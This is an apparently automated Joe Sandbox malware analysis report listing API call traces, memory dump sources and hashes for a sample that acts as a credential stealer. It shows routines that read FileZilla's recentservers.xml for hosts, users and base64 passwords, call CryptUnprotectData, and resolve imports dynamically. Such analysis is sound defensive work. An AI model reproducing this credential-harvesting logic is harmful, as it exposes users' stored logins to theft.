                                        • LocalFree.KERNEL32(?,?,?,?,022E5155,00000000,?), ref: 022E9DA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                        • Instruction ID: 963b71b57383a2556b51831be05b983c99cd137e100eaf3de134f3754485e773
                                        • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                        • Instruction Fuzzy Hash: 1711A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208059FD159B394C776A941CB90
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 022E9DEB
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 022E9E0A
                                        • memcpy.MSVCRT(?,?,?), ref: 022E9E2D
                                        • LocalFree.KERNEL32(?), ref: 022E9E3A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                        • String ID:
                                        • API String ID: 3243516280-0
                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                        • Instruction ID: f48408bfef89aa8dd0a135fe1a204d7657bd1f91c845ba2acd1cfad65f451b00
                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                        • Instruction Fuzzy Hash: 021109B8A00209EFDB04DFA8D985AAEB7B9FF89304F104559F915A7350D730AE50CFA1
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                        • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                        • LocalFree.KERNEL32(?), ref: 00409BD3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                        • String ID:
                                        • API String ID: 3243516280-0
                                        • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                        • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                        • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                        • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00860328,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00860328,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00860328,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                        • wsprintfA.USER32 ref: 00417AB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                        • String ID:
                                        • API String ID: 362916592-0
                                        • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                        • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                        • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                        • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                        APIs
                                        • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                        • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                        • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                        • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .$GetProcAddress.$l
                                        • API String ID: 0-2784972518
                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction ID: 729509d9cad45209f4adc6cfc72b6d5237bdc4143424d61a88d679ce3ad6bd9c
                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction Fuzzy Hash: B43169B6910609CFDB20CF99C880AAEBBF5FF18724F54404AD442B7314D7B1EA45CBA4
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022FD156
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                        • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                        • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                        • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                        • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                        • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                        • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a52d2d04a50fffeb6fba6c6de65239b63d906fa504325b78ba9d4f9799ac93a5
                                        • Instruction ID: 94d3470ea439886376dd95a494a9f24571a0f8351d8a4bd06469f4694a09e69c
                                        • Opcode Fuzzy Hash: a52d2d04a50fffeb6fba6c6de65239b63d906fa504325b78ba9d4f9799ac93a5
                                        • Instruction Fuzzy Hash: 5DD18371658A4C8FEB19EF68EC996EA77E1FB54304B40862ED44BC3291DF34E506CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db9edf0eafc9fbe7ebe7b4d5d84250818e1ce01c0a917c1aea8e604f05591d35
                                        • Instruction ID: 1965abb821c15ca6a0ddc7f98e0e0b8f3d803e0594cdbea1a9d7007adac4fe5e
                                        • Opcode Fuzzy Hash: db9edf0eafc9fbe7ebe7b4d5d84250818e1ce01c0a917c1aea8e604f05591d35
                                        • Instruction Fuzzy Hash: 29A14831618A4C8BEB59EF28DCD9AEA77F1FB98305F00862AD84AC7151EF34D545CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d447741bdc18da4f5f06c2e5f65dda4efe97b355be4cfe625567ad9a4926448
                                        • Instruction ID: aa88b4123a4f5cfaa7f3eaf69e32cf822f6d3bddd08b170dd095dcc2581c45cf
                                        • Opcode Fuzzy Hash: 2d447741bdc18da4f5f06c2e5f65dda4efe97b355be4cfe625567ad9a4926448
                                        • Instruction Fuzzy Hash: 3451F232318E0C4F8B1CDF6CE89867573D2FBAC311715826EE40AD72A5DB75E8468785
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924882447.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_800000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction ID: 55933e4919150de31742264a0ef7b7efc2ca1033e6ef987a080d6c13ff4005d7
                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction Fuzzy Hash: 82113C72340100AFDB94DE59DCC5EA673EAFB89374B298065E908CB356D675E842C760
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction ID: bf5abefc6b6423cf7346c2d27ca77ede209e7abe5332df108e0fd2707080945d
                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction Fuzzy Hash: 7001AC766205058FDF21DF64C804FAE33E9EB86315F8944B5E907E7245D7B4A6428F90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                        • Instruction ID: 4469cbce40bc13bee26ef3afcc501b4ee9c0e37d309943ca325b37e2282ed316
                                        • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                        • Instruction Fuzzy Hash: 9471C132471B40DBD7E63BB1DF01E4AFAA37F04702F104934BADF295749E2268659E51
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                          • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                          • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                          • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                          • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                          • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • strtok_s.MSVCRT ref: 0041031B
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                        • lstrlenA.KERNEL32(00000000), ref: 00410393
                                          • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                          • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                        • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                        • lstrlenA.KERNEL32(00000000), ref: 00410427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                        • lstrlenA.KERNEL32(00000000), ref: 00410475
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                        • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                        • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                        • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                        • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                        • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                        • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                        • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                        • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                        • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                        • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                        • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                        • strtok_s.MSVCRT ref: 00410679
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                        • memset.MSVCRT ref: 004106DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 337689325-514892060
                                        • Opcode ID: 584f56eb18d6b79ce74dee1dd1824d8b851fa4afea5a524e58ac69692fdf3eae
                                        • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                        • Opcode Fuzzy Hash: 584f56eb18d6b79ce74dee1dd1824d8b851fa4afea5a524e58ac69692fdf3eae
                                        • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                        APIs
                                        • lstrlen.KERNEL32(00424D98), ref: 022E4833
                                        • lstrlen.KERNEL32(00424E48), ref: 022E483E
                                        • lstrlen.KERNEL32(00424F10), ref: 022E4849
                                        • lstrlen.KERNEL32(00424FC8), ref: 022E4854
                                        • lstrlen.KERNEL32(00425070), ref: 022E485F
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 022E486E
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022E4875
                                        • lstrlen.KERNEL32(00425118), ref: 022E4883
                                        • lstrlen.KERNEL32(004251C0), ref: 022E488E
                                        • lstrlen.KERNEL32(00425268), ref: 022E4899
                                        • lstrlen.KERNEL32(00425310), ref: 022E48A4
                                        • lstrlen.KERNEL32(004253B8), ref: 022E48AF
                                        • lstrlen.KERNEL32(00425460), ref: 022E48C3
                                        • lstrlen.KERNEL32(00425508), ref: 022E48CE
                                        • lstrlen.KERNEL32(004255B0), ref: 022E48D9
                                        • lstrlen.KERNEL32(00425658), ref: 022E48E4
                                        • lstrlen.KERNEL32(00425700), ref: 022E48EF
                                        • lstrlen.KERNEL32(004257A8), ref: 022E4918
                                        • lstrlen.KERNEL32(00425850), ref: 022E4923
                                        • lstrlen.KERNEL32(00425918), ref: 022E492E
                                        • lstrlen.KERNEL32(004259C0), ref: 022E4939
                                        • lstrlen.KERNEL32(00425A68), ref: 022E4944
                                        • strlen.MSVCRT ref: 022E4957
                                        • lstrlen.KERNEL32(00425B10), ref: 022E497F
                                        • lstrlen.KERNEL32(00425BB8), ref: 022E498A
                                        • lstrlen.KERNEL32(00425C60), ref: 022E4995
                                        • lstrlen.KERNEL32(00425D08), ref: 022E49A0
                                        • lstrlen.KERNEL32(00425DB0), ref: 022E49AB
                                        • lstrlen.KERNEL32(00425E58), ref: 022E49BB
                                        • lstrlen.KERNEL32(00425F00), ref: 022E49C6
                                        • lstrlen.KERNEL32(00425FA8), ref: 022E49D1
                                        • lstrlen.KERNEL32(00426050), ref: 022E49DC
                                        • lstrlen.KERNEL32(004260F8), ref: 022E49E7
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022E4A03
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                        • String ID:
                                        • API String ID: 2127927946-0
                                        • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                        • Instruction ID: 42dd651cae4fdf559ff7662863ce15b254789fa5df444a68a81fcbe35965f710
                                        • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                        • Instruction Fuzzy Hash: 7041A979740624EBC718AFE5EC89B987F71AB4C712BA0C062F9029A190C7F5D5019B3E
                                        APIs
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022F9B08
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022F9B21
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022F9B39
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022F9B51
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022F9B6A
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022F9B82
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 022F9B9A
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022F9BB3
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022F9BCB
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022F9BE3
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022F9BFC
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022F9C14
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 022F9C2C
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 022F9C45
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022F9C5D
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 022F9C75
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022F9C8E
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022F9CA6
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022F9CBE
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022F9CD7
                                        • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 022F9CEF
                                        • LoadLibraryA.KERNEL32(0064A550,?,022F6C67), ref: 022F9D01
                                        • LoadLibraryA.KERNEL32(0064A17C,?,022F6C67), ref: 022F9D12
                                        • LoadLibraryA.KERNEL32(0064A104,?,022F6C67), ref: 022F9D24
                                        • LoadLibraryA.KERNEL32(0064A1DC,?,022F6C67), ref: 022F9D36
                                        • LoadLibraryA.KERNEL32(0064A328,?,022F6C67), ref: 022F9D47
                                        • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022F9D69
                                        • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 022F9D8A
